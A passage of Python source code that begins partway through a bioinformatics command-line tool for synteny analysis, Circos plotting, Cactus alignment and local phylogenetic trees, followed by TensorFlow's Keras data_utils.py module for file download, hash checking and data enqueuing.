genome2 = Genome(fasta_file=fasta_2, bed_file=work_dir+gff_2.split('.')[-2]+'.bed', protID=gff_2.split('.')[-2], gff_file=gff_2, gene_info=gene_info)
genome2.export_karyotype(work_dir+fasta_2[:fasta_2.rfind('.')]+'.karyotype.txt',n_chromosomes, chrom_file=chrom_file2)
if not link_file:
genome1.extract_CDS()
genome2.extract_CDS()
pairwise_synteny = PairwiseSynteny(genome1,genome2,link_file,loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure('./')
pairwise_synteny.synteny_structure_2_link(work_dir+'/%s.%s.link.txt'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID), bundle_links = bundle_links, link_gap = link_gap)
if not no_output_circos:
circos_obj = Circos(pairwise_synteny)
circos_obj.generate_config(ticks = work_dir+'./txticks.conf', ideogram = work_dir+'/txideogram.conf', links_and_rules = work_dir+'/linksAndrules.conf', config=work_dir+'/circos.conf', variable_thickness=variable_thickness, thickness_factor=thickness_factor, switch_lines=switch_lines)
circos_obj.run_circos(work_dir)
@joshuatree.command()
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
@click.option('-gff', '--gff_path', default = './gff_path/', show_default=True, help='Gff path containing all of the gff/gff3 files. Gff naming must conform to: xxx.[protID].[gff/gff3].', type=click.Path(exists=False))
@click.option('-s', '--synteny_path', default = './synteny_path/', show_default=True, help='Path containing synteny files, .unout or .anchors files. *.unout must conform to following pattern: [PAC4GC/PAC2_0].[q_protID]-[PAC4GC/PAC2_0].[s_protID]_5.unout; *.anchors must conform to: [q_protID].[s_protID].[*].anchors. Not neccessary to add files to this path, synteny will be generated if no specification.', type=click.Path(exists=False))
@click.option('-bed', '--bed_path', default = './bed_path/', show_default=True, help='Bed path containing all of the bed files.', type=click.Path(exists=False))
@click.option('-ci', '--circos_inputs', default = './circos_inputs/', show_default=True, help='Path containing all of circos inputs and configuration files.', type=click.Path(exists=False))
@click.option('-co', '--circos_outputs', default = './circos_outputs/', show_default=True, help='Path containing all of circos output images.', type=click.Path(exists=False))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-n', '--n_cpus', default = 16, show_default=True, help='Number of cpus used to convert hal 2 maf files.')
def circos_dropper(fasta_path, gff_path, synteny_path, bed_path, circos_inputs, circos_outputs, loci_threshold,gene_info, n_cpus):
"""Visualize many pairwise synteny results. If synteny files are not supplied, conduct pairwise synteny between all included strains."""
fasta_files = {fasta.split('_')[-2] : fasta for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')}
gff_files = {gff.split('.')[-2] : gff for gff in glob.glob(gff_path+'/*.gff')+glob.glob(gff_path+'/*.gff3') }
intersect_keys = set(fasta_files.keys()) & set(gff_files.keys())
fasta_files = {protID:fasta for protID,fasta in fasta_files.items() if protID in intersect_keys}
gff_files = {protID:gff for protID,gff in gff_files.items() if protID in intersect_keys}
genomes = {}
pairwise_syntenies = []
print gff_files, fasta_files
for protID in intersect_keys:
genomes[protID] = Genome(fasta_files[protID],bed_path+'/'+protID+'.bed',protID,gff_files[protID],gene_info)
genomes[protID].export_karyotype(circos_inputs+'/'+protID+'.karyotype.txt')
print genomes
synteny_files = glob.glob(synteny_path+'/*.unout')+glob.glob(synteny_path+'/*.lifted.anchors')
synteny_protIDs = []
if synteny_files:
for synteny_file in synteny_files:
if synteny_file.endswith('.unout'):
coords = reduce(lambda x,y: x+y, sorted([[m.start(0),m.end(0)] for m in re.finditer('PAC2_0|PAC4GC',synteny_file)]))[1::2]
q_protID, s_prot_ID = map(lambda x: synteny_file[x+1:x+4],coords)
else:
q_protID, s_prot_ID = tuple(synteny_file[synteny_file.rfind('/')+1:].split('.')[:2])
synteny_protIDs.extend([(q_protID, s_prot_ID),(s_prot_ID, q_protID)])
pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],synteny_file,loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure(synteny_path)
pairwise_syntenies.append(pairwise_synteny)
remaining_synteny = set(list(combinations(intersect_keys,r=2))) - set(synteny_protIDs)
else:
remaining_synteny = list(combinations(intersect_keys,r=2))
if remaining_synteny:
#print remaining_synteny
def generate_CDS(protID):
print(protID)
genomes[protID].extract_CDS()
return protID
p = mp.ProcessingPool(n_cpus)
r = p.amap(generate_CDS,list(set(reduce(lambda x,y: list(x)+list(y),remaining_synteny))))
r.wait()
protIDs = r.get()
print(protIDs)
#p = mp.ProcessingPool(ncpus=n_cpus)
#p.daemon = True
#r = p.amap(generate_CDS,list(set(reduce(lambda x,y: list(x)+list(y),remaining_synteny)))) # get pathos multiprocessing https://github.com/uqfoundation/pathos
#while not r.ready():
# sleep(5)
#r.wait()
"""
for protID in set(reduce(lambda x,y: list(x)+list(y),remaining_synteny)):
proc = mp.Process(target=lambda: genomes[protID].extract_CDS, args=None)
proc.daemon = True
proc.start()
while len(mp.active_childern()) > n_cpus:
sleep(1)
while len(mp.active_childern()) > 0:
sleep(1)"""
# fixme add remaining prot ID feauture
#def mycallback(x):
# pairwise_syntenies.extend(x)
def p_synteny(protIDs):
print(protIDs)
q_protID, s_prot_ID = protIDs
pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure(synteny_path)
return pairwise_synteny
"""
for q_protID, s_prot_ID in combinations(genomes.keys(),r=2):
pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure(synteny_path)
pairwise_syntenies.append(pairwise_synteny)"""
r = p.amap(p_synteny,remaining_synteny)#,callback=mycallback) # _async
r.wait()
pairwise_syntenies.extend(r.get())
p.close()
for pairwise_synteny in pairwise_syntenies:
pairwise_synteny.synteny_structure_2_link(circos_inputs+'/%s.%s.link.txt'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID))
circos_obj = Circos(pairwise_synteny)
circos_obj.generate_config(ticks = circos_inputs+'/txticks.conf', ideogram = circos_inputs+'/txideogram.conf', links_and_rules = circos_inputs+'/linksAndrules.conf', config=circos_inputs+'/circos.conf')
circos_obj.run_circos(circos_outputs+'/')
#####################################
#### PAIRWISE SEQUENCE ALIGNMENT ####
@joshuatree.command()
@click.option('-f1', default = './genome1.fa', show_default=True, help='Path containing fasta file one.', type=click.Path(exists=False))
@click.option('-f2', default = './genome2.fa', show_default=True, help='Path containing fasta file two.', type=click.Path(exists=False))
@click.option('-maf', '--out_file', default = './output.maf', show_default=True, help='Output in maf format.', type=click.Path(exists=False))
def pairwise_alignment(f1,f2, out_file):
"""Compute pairwise alignment between two genomes."""
subprocess.call("samtools faidx %s && samtools faidx %s && lastz --format=maf %s %s > %s"%(f1,f2,f1,f2,out_file),shell=True)
####################
#### RUN CACTUS ####
@joshuatree.command()
@click.option('-fo', '--fasta_output_path', default = './fasta_output/', show_default=True, help='Path containing all syntenic aligned regions, organized into fasta files for multiple sequence alignment via Cactus.', type=click.Path(exists=False))
@click.option('-c', '--cactus_run_directory', default = './cactus_run/', show_default=True, help='Directory containing cactus run information.', type=click.Path(exists=False))
#@click.option('-cac', '--cactus_softlink', default = './runProgressiveCactus.sh', show_default=True, help='Name of softlinked Progressive Cactus batch script file.', type=click.Path(exists=False))
@click.option('-cac', '--cactus_softlink', default = './runProgressiveCactus/', show_default=True, help='Name of softlinked Progressive Cactus distribution.', type=click.Path(exists=False))
#@click.option('-env', '--cactus_env_softlink', default = './cactus_environment', show_default=True, help='Name of softlinked Progressive Cactus virtual environment file.', type=click.Path(exists=False))
@click.option('-n', '--n_cpus', default = 16, show_default=True, help='Number of cpus used to convert hal 2 maf files.')
@click.option('-h2m', '--hal2maf_softlink', default = './hal2maf', show_default=True, help='Name of softlinked Progressive Cactus hal2maf program.', type=click.Path(exists=False))
@click.option('-h2m', '--nickname_file', default = '', show_default=True, help='File containing protID nickname in each line for all protIDs, can omit this file by leaving it blank.', type=click.Path(exists=False))
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
@click.option('-s', '--submission_system', default = 'local', show_default=True, help='Different nextflow submission system to use.', type=click.Choice(['local','sge','slurm']))
@click.option('-shift', '--shifter', is_flag = True, help='Use shifter instead of docker.')
def run_cactus(fasta_output_path,cactus_run_directory,cactus_softlink, n_cpus, hal2maf_softlink, nickname_file, fasta_path, submission_system, shifter): #fixme get rid of '' and add to command line tool
"""Run multiple sequence alignment via Progressive Cactus on multiple species synteny blocks and export as maf files. Try to run softlink_cactus beforehand, else use official cactus paths instead of softlinks."""
cactus_run_obj = CactusRun(fasta_output_path,cactus_run_directory,cactus_softlink, nickname_file, fasta_path)
cactus_run_obj.write_fastas_seqfile()
cactus_run_obj.run_cactus(submission_system, shifter=shifter)
cactus_run_obj.hal2maf(n_cpus, hal2maf_softlink)
@joshuatree.command()
@click.option('-cd', '--cactus_distribution_dir', default = './progressiveCactus/', show_default=True, help='Path containing installed Progressive Cactus Distribution.', type=click.Path(exists=False))
#@click.option('-cac', '--softlink_cactus_name', default = './runProgressiveCactus.sh', show_default=True, help='Name of softlinked Progressive Cactus batch script file.', type=click.Path(exists=False))
@click.option('-cac', '--softlink_cactus_name', default = './runProgressiveCactus', show_default=True, help='Name of softlinked Progressive Cactus distribution.', type=click.Path(exists=False))
#@click.option('-env', '--softlink_env_name', default = './cactus_environment', show_default=True, help='Name of softlinked Progressive Cactus virtual environment file.', type=click.Path(exists=False))
@click.option('-h2m', '--softlink_hal2maf_name', default = './hal2maf', show_default=True, help='Name of softlinked Progressive Cactus hal2maf program.', type=click.Path(exists=False))
def softlink_cactus(cactus_distribution_dir,softlink_cactus_name, softlink_hal2maf_name):
"""Softlink cactus distribution's cactus bash script, virtual environment, and hal2maf program. Useful if installed Cactus to particular directory and want to save time in referencing that directory when running cactus."""
#subprocess.call('ln -s %s %s'%(os.path.abspath(cactus_distribution_dir+'/bin/runProgressiveCactus.sh'),softlink_cactus_name),shell=True)
#subprocess.call('ln -s %s %s'%(os.path.abspath(cactus_distribution_dir+'/environment'),softlink_env_name),shell=True)
subprocess.call('ln -s %s %s'%(os.path.abspath(cactus_distribution_dir),softlink_cactus_name),shell=True)
subprocess.call('ln -s %s %s'%(os.path.abspath(cactus_distribution_dir+'/submodules/hal/bin/hal2mafMP.py'),softlink_hal2maf_name),shell=True)
@joshuatree.command()
@click.option('-i','--install_path', help='Install Path.', type=click.Path(exists=False))
def install_cactus(install_path):
"""Install the Cactus distribution and hal tools.""" # fixme, make sure hal tools works
os.chdir(install_path)
conda_env = os.popen('echo $CONDA_PREFIX').read().split('/')[-1]
subprocess.call('git config --global --add http.sslVersion tlsv1.2\ngit clone git://github.com/glennhickey/progressiveCactus.git\ncd progressiveCactus\ngit pull\ngit submodule update --init\nmake',shell=True)
# source deactivate\n \nsource activate %s\n'%conda_env
# fixme, functions to add, nextflow progressiveCactus executor, move maf to new folder, visualize CS, breakdown into CNS elements, extract vcf, local PCA, local Trees, run iqtree, plottree, visualize tree with ete3, merge/intersect vcf, mafstrander, maffilter, vcf to snp matrix, plotPositions and all associated tools,
# fixme anything with vcf or SNPs should be one class; convert mafobject to vcf object, vcf2tab inside vcf object
# fixme main ideas extract vcf, CNS, visualize snps and cns, chrom spatial and PCA, compute phylogeny via SNPs, local tree topology, vcf operations,
####################
#### fixme add commands with snps and maf ####
####################
#### MAF Commands
####################
#### VCF Commands
####################
#### Tree Commands
####################
#### Local Tree Topology + Local PCA
@joshuatree.command()
@click.option('-vcf','--vcf_file', help='Input vcf file.', type=click.Path(exists=False))
@click.option('-i','--snps_interval', default = 4000, show_default=True, help='How many snps to use per localized window.', type=click.Path(exists=False))
@click.option('-phy','--phylogeny', default='iqtree', show_default=True, help='Phylogenetic analysis to use.', type=click.Choice(['iqtree','phyml','fasttree']))
@click.option('-w','--work_dir', default = './', show_default = True, help='Work directory for local tree analysis.', type=click.Path(exists=False))
def run_local_trees(vcf_file,snps_interval, phylogeny, work_dir):
snp = SNP(vcf_file)
snp.run_local_trees(snps_interval, phylogeny, work_dir)
@joshuatree.command()
@click.option('-vcf','--vcf_file', help='Input vcf file.', type=click.Path(exists=False))
@click.option('-tab','--tab_file', default='out.tab', show_default=True, help='Output tab file.', type=click.Path(exists=False))
def vcf2tab(vcf_file, tab_file):
snp = SNP(vcf_file)
snp.vcf2tab(tab_file)
@joshuatree.command()
@click.option('-tab','--tab_file', default='in.tab', show_default=True, help='Input tab file.', type=click.Path(exists=False))
@click.option('-i','--snp_interval', default = 4000, show_default=True, help='How many snps to use per localized window.', type=click.Path(exists=False))
@click.option('-o', '--write_file', default = './output.trees', show_default=True, help='File to write information on local fasta file chunks from local SNPs.',type=click.Path(exists=False))
def tab2chunks(tab_file, snp_interval, write_file):
snp = SNP(tab_file,'tab')
snp.tab2chunks(tab_file,snp_interval, write_file)
@joshuatree.command()
@click.option('-f','--fasta_file', default='in.fasta', show_default=True, help='Input fasta file.', type=click.Path(exists=False))
@click.option('-p','--phylogeny', default='iqtree', show_default=True, help='Phylogenetic analysis to use.', type=click.Choice(['iqtree','phyml','fasttree']))
@click.option('-t','--tree_file', default = './out.treefile', show_default=True, help='Output tree file, newick format.', type=click.Path(exists=False))
def generate_phylogeny(fasta_file, phylogeny, tree_file):
fasta = fasta_aln(fasta_file)
fasta.generate_tree(phylogeny, tree_out = tree_file, model='GTR',bootstrap=1, n_threads = '1')
@joshuatree.command()
@click.option('-t','--tree_file', default = './in.treefile', show_default=True, help='Input tree file, newick format.', type=click.Path(exists=False))
@click.option('-i','--interval', default = '', show_default=True, help='Bed interval of tree, delimited by underscore.', type=click.Path(exists=False))
@click.option('-o','--out_file', default = 'out.interval', show_default=True, help='Output file containing interval and tree', type=click.Path(exists=False))
def write_trees_intervals(tree_file,interval, out_file):
TreeObj(tree_file).write_trees_intervals(interval, out_file)
@joshuatree.command()
@click.option('-t','--trees_file', default = './in.treesfile', show_default=True, help='Input trees file, containing intervals and trees.', type=click.Path(exists=False))
@click.option('-w','--work_dir', default = './', show_default = True, help='Work directory for local tree analysis.', type=click.Path(exists=False))
def local_trees2final_output(trees_file,work_dir):
TreeObj(trees_file).local_trees2final_output(work_dir)
#### RUN CLI ####
if __name__ == '__main__':
joshuatree()
|
data_utils.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import abstractmethod
from contextlib import closing
import hashlib
import multiprocessing
from multiprocessing.pool import ThreadPool
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import traceback
import zipfile
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.util.tf_export import tf_export
try:
import queue
except ImportError:
import Queue as queue
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Arguments:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Arguments:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format is 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type is 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type is 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@tf_export('keras.utils.get_file')
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Arguments:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras
Directory](/faq/#where-is-the-keras-configuration-filed-stored).
Returns:
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' + file_hash +
' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size is -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Arguments:
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Arguments:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
if ((algorithm is 'sha256') or
(algorithm is 'auto' and len(file_hash) is 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
@tf_export('keras.utils.Sequence')
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implements the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
# Notes
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once
on each sample per epoch which is not the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Arguments:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Creates an infinite generator that iterate over the Sequence.
Yields:
Sequence items.
"""
while True:
for item in (self[i] for i in range(len(self))):
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Arguments:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@tf_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Examples:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
@abstractmethod
def is_running(self):
raise NotImplementedError
@abstractmethod
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Arguments:
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`).
"""
raise NotImplementedError
@abstractmethod
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
Arguments:
timeout: maximum time to wait on thread.join()
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Returns:
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
Arguments:
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.shuffle = shuffle
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
Arguments:
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = lambda seqs: multiprocessing.Pool( # pylint: disable=g-long-lambda
workers, initializer=init_pool, initargs=(seqs,))
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
six.raise_from(StopIteration(e), e)
def _send_sequence(self):
"""Send current Sequence to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Arguments:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
@tf_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
Arguments:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self,
generator,
use_multiprocessing=False,
wait_time=0.05,
seed=None):
self.wait_time = wait_time
self._generator = generator
if os.name is 'nt' and use_multiprocessing is True:
# On Windows, avoid **SYSTEMATIC** error in `multiprocessing`:
# `TypeError: can't pickle generator objects`
# => Suggest multithreading instead of multiprocessing on Windows
raise ValueError('Using a generator with `use_multiprocessing=True`'
' is not supported on Windows (no marshalling of'
' generators across process boundaries). Instead,'
' use single thread/process or multithreading.')
else:
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self._manager = None
self.queue = None
self.seed = seed
def _data_generator_task(self):
